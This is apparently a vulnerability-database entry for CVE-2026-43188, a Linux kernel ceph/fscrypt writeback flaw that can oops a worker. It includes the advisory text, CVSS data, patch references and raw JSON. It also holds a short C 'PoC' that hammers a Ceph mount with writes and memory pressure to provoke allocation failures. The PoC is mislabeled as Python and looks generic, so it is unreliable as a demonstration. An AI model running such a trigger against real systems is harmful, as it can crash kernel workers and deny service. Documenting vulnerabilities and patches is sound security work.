Security Vulnerability Report
中文
CVE-2026-43188 CVSS 5.5 MEDIUM

CVE-2026-43188

Published: 2026-05-06 12:16:38
Last Modified: 2026-05-11 20:38:39
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: ceph: do not propagate page array emplacement errors as batch errors When fscrypt is enabled, move_dirty_folio_in_page_array() may fail because it needs to allocate bounce buffers to store the encrypted versions of each folio. Each folio beyond the first allocates its bounce buffer with GFP_NOWAIT. Failures are common (and expected) under this allocation mode; they should flush (not abort) the batch. However, ceph_process_folio_batch() uses the same `rc` variable for its own return code and for capturing the return codes of its routine calls; failing to reset `rc` back to 0 results in the error being propagated out to the main writeback loop, which cannot actually tolerate any errors here: once `ceph_wbc.pages` is allocated, it must be passed to ceph_submit_write() to be freed. If it survives until the next iteration (e.g. due to the goto being followed), ceph_allocate_page_array()'s BUG_ON() will oops the worker. Note that this failure mode is currently masked due to another bug (addressed next in this series) that prevents multiple encrypted folios from being selected for the same write. For now, just reset `rc` when redirtying the folio to prevent errors in move_dirty_folio_in_page_array() from propagating. Note that move_dirty_folio_in_page_array() is careful never to return errors on the first folio, so there is no need to check for that. After this change, ceph_process_folio_batch() no longer returns errors; its only remaining failure indicator is `locked_pages == 0`, which the caller already handles correctly.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < commit 4c0d84c788d89c167abf0bf84fd37890c4c84f08
Linux Kernel < commit 707104682e3c163f7c14cdd6b07a3e95fb374759
Linux Kernel < commit 746840c87d76b614b14d9337c466ff022fc49823

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-43188 * Concept: Trigger memory pressure during writeback on a Ceph mount with fscrypt. * This attempts to induce GFP_NOWAIT allocation failures in the kernel. */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <sys/stat.h> #include <sys/types.h> #define MOUNT_POINT "/mnt/ceph" // Replace with actual Ceph mount point #define FILE_NAME "trigger.dat" #define BUFFER_SIZE (4 * 1024 * 1024) // 4MB chunks void consume_memory() { // Attempt to pressure memory to trigger GFP_NOWAIT failures void *ptrs[100]; for(int i = 0; i < 100; i++) { ptrs[i] = malloc(10 * 1024 * 1024); // Alloc 10MB if(!ptrs[i]) break; } // Free immediately to loop, or hold to increase pressure for(int i = 0; i < 100; i++) { if(ptrs[i]) free(ptrs[i]); } } int main() { char path[256]; snprintf(path, sizeof(path), "%s/%s", MOUNT_POINT, FILE_NAME); int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644); if (fd < 0) { perror("open failed"); return 1; } char *buffer = malloc(BUFFER_SIZE); if (!buffer) { perror("malloc failed"); close(fd); return 1; } memset(buffer, 'A', BUFFER_SIZE); printf("Starting write operations to trigger bug..."); fflush(stdout); // Write loop to force writeback for (int i = 0; i < 1000; i++) { write(fd, buffer, BUFFER_SIZE); // Sync occasionally to force writeback operations if (i % 10 == 0) { fsync(fd); consume_memory(); // Try to disrupt allocation } } free(buffer); close(fd); unlink(path); printf("Exploit attempt finished.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43188", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:37.600", "lastModified": "2026-05-11T20:38:38.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: do not propagate page array emplacement errors as batch errors\n\nWhen fscrypt is enabled, move_dirty_folio_in_page_array() may fail\nbecause it needs to allocate bounce buffers to store the encrypted\nversions of each folio. Each folio beyond the first allocates its bounce\nbuffer with GFP_NOWAIT. Failures are common (and expected) under this\nallocation mode; they should flush (not abort) the batch.\n\nHowever, ceph_process_folio_batch() uses the same `rc` variable for its\nown return code and for capturing the return codes of its routine calls;\nfailing to reset `rc` back to 0 results in the error being propagated\nout to the main writeback loop, which cannot actually tolerate any\nerrors here: once `ceph_wbc.pages` is allocated, it must be passed to\nceph_submit_write() to be freed. If it survives until the next iteration\n(e.g. due to the goto being followed), ceph_allocate_page_array()'s\nBUG_ON() will oops the worker.\n\nNote that this failure mode is currently masked due to another bug\n(addressed next in this series) that prevents multiple encrypted folios\nfrom being selected for the same write.\n\nFor now, just reset `rc` when redirtying the folio to prevent errors in\nmove_dirty_folio_in_page_array() from propagating. Note that\nmove_dirty_folio_in_page_array() is careful never to return errors on\nthe first folio, so there is no need to check for that. After this\nchange, ceph_process_folio_batch() no longer returns errors; its only\nremaining failure indicator is `locked_pages == 0`, which the caller\nalready handles correctly."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.18.16", "matchCriteriaId": "5B5F989F-E891-48E4-9EC9-3C5EFD3DB9DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4c0d84c788d89c167abf0bf84fd37890c4c84f08", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/707104682e3c163f7c14cdd6b07a3e95fb374759", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/746840c87d76b614b14d9337c466ff022fc49823", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.